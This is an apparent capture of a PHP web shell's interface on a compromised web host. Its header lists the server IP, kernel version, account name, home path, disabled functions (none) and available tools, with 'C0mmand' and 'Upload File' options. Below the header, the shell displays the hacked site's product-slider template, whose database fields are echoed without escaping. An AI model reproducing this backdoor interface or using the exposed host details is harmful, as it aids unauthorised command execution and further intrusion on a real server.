Server IP : 103.53.40.154 / Your IP : 18.222.166.127 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/adowoods.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $feature_query=db_query("SELECT * FROM tbl_category WHERE category_status='Active' and category_is_featured='Yes'"); if(mysqli_num_rows($feature_query)>0){ ?> <section class="page-block-small"> <div class="container"> <div class="row"> <div class="slider1"> <?php while($featured=mysqli_fetch_array($feature_query)){ ?> <div class="slide"> <div class="col-md-12 col-sm-12 col-xs-12 wow fadeInDown" data-wow-duration="0.50s" data-wow-delay="1.25s" style="height: 450px;"> <img src="<?=$site_url?>/uploaded_files/<?=$featured['category_image_name']?>" class="img-responsive slider-product" title="Manufacturers Exporters and Wholesale Suppliers of <?=$featured['category_name']?> <?php echo $compDATA['admin_city']; ?> <?php echo $compDATA['admin_state']; ?>" alt="Manufacturers Exporters and Wholesale Suppliers of <?=$featured['category_name']?> <?php echo $compDATA['admin_city']; ?> <?php echo $compDATA['admin_state']; ?>" /> <h3><!--<small>Ado </small>--><?=$featured['category_name']?></h3><span class="line"></span> <p style="position: relative;"><?=strip_tags(substr($featured['category_description'],0,140))?> <a class="btn btn-sec btn-sm" href="<?=$site_url?>/<?=$featured['category_url']?>.html" title="See All" style="position: absolute; top: 80px; left: 0px;">Details <i class="fa fa-chevron-circle-right"></i></a> <a class="btn btn-primary btn-sm" href="<?=$site_url?>/contact-us.html" title="See All" style="position: absolute; top: 80px; left: 85px;">Enquiry<i class="fa fa-chevron-circle-right"></i></a> </p> </div> </div> <?php }?> </div> </div> </div> </section> <?php }?>